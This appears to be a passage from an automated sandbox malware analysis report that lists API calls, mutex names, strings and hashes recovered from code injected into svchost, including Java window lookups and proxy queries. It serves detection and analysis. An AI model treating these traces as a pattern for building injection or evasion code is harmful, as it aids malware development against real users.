                                                                                                                                                                                                                • Part of subcall function 02C974A0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02C97572
                                                                                                                                                                                                                • Part of subcall function 02C974A0: UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02C97585
                                                                                                                                                                                                                • Part of subcall function 02C974A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C97594
                                                                                                                                                                                                                • Part of subcall function 02C974A0: HeapValidate.KERNEL32(00000000), ref: 02C9759B
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 02CB53BE
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 02CB53D2
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,02CA56AF), ref: 02CB53E3
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02CB53F3
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02CA56AF), ref: 02CB5430
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,02CA56AF), ref: 02CB5433
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02CA56AF), ref: 02CB5440
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,02CA56AF), ref: 02CB5443
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$Validate$AddressAllocateCountCreateFreeHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1866686876-3277137149
                                                                                                                                                                                                              • Opcode ID: 0502d72069903b1fc8c074e66c87e61a047de8c089a73587b04961f9f6bb049d
                                                                                                                                                                                                              • Instruction ID: 8ef7df1acf71ebaee58d52a42f02b7ca34b0fd8607d8fb67577261bb0b8b099d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0502d72069903b1fc8c074e66c87e61a047de8c089a73587b04961f9f6bb049d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2611C831A822017BD7109B759C08F9B7BADFF85795F948A15F905E7140DB71D610CEA0
                                                                                                                                                                                                              Function 02CB43F0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 56sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02CB440C
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CB4422
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02CB4430
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CB4439
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CB4451
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB4463
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED19C), ref: 02CB446E
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,02CED19C,VEFK), ref: 02CB4488
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
                                                                                                                                                                                                              • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$VEFK
                                                                                                                                                                                                              • API String ID: 849374196-3911370694
                                                                                                                                                                                                              • Opcode ID: bb5c9e71adb3c2d1871c4cc6b7fcf58b5ef1cb7312bf690b21db9eb12b48ab62
                                                                                                                                                                                                              • Instruction ID: 76532795cb75320f777d7efe5ff0ea67a48b38b1723064da35eb9c8675044344
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb5c9e71adb3c2d1871c4cc6b7fcf58b5ef1cb7312bf690b21db9eb12b48ab62
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E016832AC63103BF23267649C16F9EB39C9F84BA0F004621FE05E61C19BF098108AB5
                                                                                                                                                                                                              Function 02CB0110 Relevance: 17.5, APIs: 8, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,02CDA450), ref: 02CB0121
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,02CDA488), ref: 02CB0131
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,02CDA4B8), ref: 02CB0141
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,02CDA4D8), ref: 02CB0151
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,02CDA450), ref: 02CB0161
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,02CDA488), ref: 02CB0171
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,02CDA4B8), ref: 02CB0181
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,02CDA4D8), ref: 02CB0191
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FindWindow
                                                                                                                                                                                                              • String ID: SunAwtDialog$SunAwtFrame
                                                                                                                                                                                                              • API String ID: 134000473-1757792087
                                                                                                                                                                                                              • Opcode ID: 9ad7a00a664129f29e68896f90d28e15796d2f6be1de5224dfe1085245d1686a
                                                                                                                                                                                                              • Instruction ID: 291359eb45390784dcf450297b07ab703c1e783c01b4c6a61f5d474cff60bcbf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ad7a00a664129f29e68896f90d28e15796d2f6be1de5224dfe1085245d1686a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1F01499BC2B66687A59767A2D0AFA61B8C0DD0CC9B456072BF4BF5008FBC0B54309F5
                                                                                                                                                                                                              Function 02CB32B0 Relevance: 17.5, APIs: 7, Strings: 3, Instructions: 41sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02CB32DC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CB32E5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB32F9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB330B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4505), ref: 02CB3316
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,A23C4505,RFK), ref: 02CB3330
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CB3336
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: A23C4505$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                              • API String ID: 4280258085-1619370212
                                                                                                                                                                                                              • Opcode ID: 0e629c7ebca80387900f46e4ef0ce95684fbab3ec49704be3b819e937e85d1b6
                                                                                                                                                                                                              • Instruction ID: 6fa48fea6fff4ccbeca5771e983ab3ecba5f5b72252cb121ce52f14c020df026
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e629c7ebca80387900f46e4ef0ce95684fbab3ec49704be3b819e937e85d1b6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44F02870AC67956BF21267615C0AF9FB79C6F44B54F804255FA16E30C18BF055018AB6
                                                                                                                                                                                                              Function 02CAB8F0 Relevance: 17.5, APIs: 7, Strings: 3, Instructions: 41sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02CAB91C
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CAB925
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAB939
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAB94B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c41af), ref: 02CAB956
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,a23c41af,ALPHA), ref: 02CAB970
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CAB976
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$a23c41af
                                                                                                                                                                                                              • API String ID: 4280258085-2804296356
                                                                                                                                                                                                              • Opcode ID: c263e48e9115fe9f9285000857e2d08bb6fe1d5c1cede66a184e44197ae4d908
                                                                                                                                                                                                              • Instruction ID: 5ba30175bca56a5de3d2e167a1941da8d3380bd316f08a35c2f9b6256b8095de
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c263e48e9115fe9f9285000857e2d08bb6fe1d5c1cede66a184e44197ae4d908
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BF028306CA3167BE60167719C1AF1A77BCBF54A9CF400610F606E21C0C7F0AA14D7B6
                                                                                                                                                                                                              Function 02CAFE80 Relevance: 17.5, APIs: 7, Strings: 3, Instructions: 41sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02CAFEAC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CAFEB5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAFEC9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAFEDB
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4015), ref: 02CAFEE6
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,a23c4015,HANDY), ref: 02CAFF00
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CAFF06
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: HANDY$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$a23c4015
                                                                                                                                                                                                              • API String ID: 4280258085-448726435
                                                                                                                                                                                                              • Opcode ID: dac96b25e4a688c8e037d4769489a76b361b698e73b0053a1c75951037d0f884
                                                                                                                                                                                                              • Instruction ID: 958965c619ba237c0f704ac0d61f9ba29788863dfdf2b3dffa8b4ff353e677bd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dac96b25e4a688c8e037d4769489a76b361b698e73b0053a1c75951037d0f884
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4EF028306C63077FE21067A18C1AF1BB7DCAF46A59F400218FA4AE20C19BF495108AB6
                                                                                                                                                                                                              Function 02CACB98 Relevance: 17.5, APIs: 7, Strings: 3, Instructions: 34sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 02CACBAC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CACBB9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CACBCD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CACBDF
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02CACBEE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C41FB), ref: 02CACBF5
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,A23C41FB,BSS), ref: 02CACC0F
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CACC15
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
                                                                                                                                                                                                              • String ID: A23C41FB$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
                                                                                                                                                                                                              • API String ID: 3206501308-2766367083
                                                                                                                                                                                                              • Opcode ID: 7a23b4252aac6380b2a0bb00b53b19c4f02097efa9024662a48f2e8cb191b4a4
                                                                                                                                                                                                              • Instruction ID: a317c360c9e840e85e5b1cea7f2484da03eeda8de707b5f589e065bc4982a261
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a23b4252aac6380b2a0bb00b53b19c4f02097efa9024662a48f2e8cb191b4a4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DF02B30A8B301EFE72267609C19F5E77986F45F59F400606F912E21C1CBB48604CB62
                                                                                                                                                                                                              Function 02C991B0 Relevance: 16.6, APIs: 11, Instructions: 120filesynchronizationmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?,74DF3050,74DF30D0,74DF3080), ref: 02C991F0
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C99204
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9920F
                                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000,?,00000006,00000000), ref: 02C99237
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C99254
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C99265
                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02CDF54C), ref: 02C99285
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02C9929C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02C992DC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,0000007E,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02C99324
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000006,00000001,00000000,00000000), ref: 02C9932D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleMutexObjectReleaseSingleViewWait$CloseCreateDesktopFreeHeapInformationMappingThreadUnmap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2125184990-0
                                                                                                                                                                                                              • Opcode ID: e3aff11954249100339825fec3bedcb5407fc4de9b76695539b833bcbcb76a92
                                                                                                                                                                                                              • Instruction ID: b1aa42f6ef8bc8225cad815aadde24ca962f4ce2b5cd12e751ea1596121a37fd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3aff11954249100339825fec3bedcb5407fc4de9b76695539b833bcbcb76a92
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99419375A81240ABDB10EF64DC49F6A77A9BB89310F544F09FA11DB281D7B1A820CB60
                                                                                                                                                                                                              Function 02CA01A0 Relevance: 16.6, APIs: 11, Instructions: 115memorynetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA01F4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02CA020C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA020F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CA021C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA021F
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000022,00000000,-02CDFAE4), ref: 02CA023C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000014), ref: 02CA0259
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA0260
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA0270
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA02B5
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CA02C9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Processmemset$AllocFreeInternetOptionQueryValidatememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3911349929-0
                                                                                                                                                                                                              • Opcode ID: 894946da9c390a5735e8d83a9cf2303137fe07490525615b0a13e8e28a39001b
                                                                                                                                                                                                              • Instruction ID: 638419913b498c5a02c362d31383618321608253dd7c14c2e389ad1742da2aac
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 894946da9c390a5735e8d83a9cf2303137fe07490525615b0a13e8e28a39001b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3341B371A40305AFD720DFA4DC94F6AB7F8FB88744F108A58E945E7280DB70EA14CBA0
                                                                                                                                                                                                              Function 02CA0050 Relevance: 16.6, APIs: 11, Instructions: 96memorynetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA0071
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,?), ref: 02CA008C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA008F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CA009C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA009F
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 02CA00BC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000014), ref: 02CA00D9
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA00E0
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA00F0
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA0109
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CA011C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Processmemset$AllocFreeInternetOptionQueryValidatememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3911349929-0
                                                                                                                                                                                                              • Opcode ID: 53c55e97244889ff879be2b3db60e015cca7863eb9f725e2360964011e39223e
                                                                                                                                                                                                              • Instruction ID: 733b5582f0ac65013ca781d119c6ad7ed6e357845f053b56240bc053aed476e8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53c55e97244889ff879be2b3db60e015cca7863eb9f725e2360964011e39223e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F31E371A41215ABE720DF68DC89F5677ACEF48754F448244FE48DB281DB30A915CBF0
                                                                                                                                                                                                              Function 02C9F3C0 Relevance: 16.5, APIs: 13, Instructions: 218memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,-059BF5C8,00000000,00000000,?,?,?,?), ref: 02C9F404
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02C9F40B
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C9F41B
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02C9F426
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,00000000,00000000,?,?,02CD56DC,?,02CD5E1C,-059BF5C8,00000000,00000000,?), ref: 02C9F4EE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C9F4F5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,00000000), ref: 02C9F501
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C9F508
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02C9F52E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,-059BF5C8,00000000,00000000,?,?,?,?), ref: 02C9F55A
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C9F55D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C9F56A
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02C9F56D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidatememcpy$Allocmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1948005343-0
                                                                                                                                                                                                              • Opcode ID: 33d39230c02afad012f3ef867e3678eedea66b59a19d15b0d6babf96514962ac
                                                                                                                                                                                                              • Instruction ID: 77c8b0d3f3e8bc978d61ddc2eb95f0afae9d853790a0e89a1772659a5315379e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33d39230c02afad012f3ef867e3678eedea66b59a19d15b0d6babf96514962ac
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2061A372A002199BDF20DF59D888BAEB7A9FF89764F048259ED05D7240D771E911CBE0
                                                                                                                                                                                                              Function 02C97B00 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 124registrymemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C97B33
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C97B4B
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,?,?,?,?,?,?,74DEF380), ref: 02C97B6C
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00000104,00000000,00000001,?,00000104,?,?,?,?,?,74DEF380), ref: 02C97B92
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,74DEF380), ref: 02C97C1D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,74DEF380), ref: 02C97C24
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C97C33
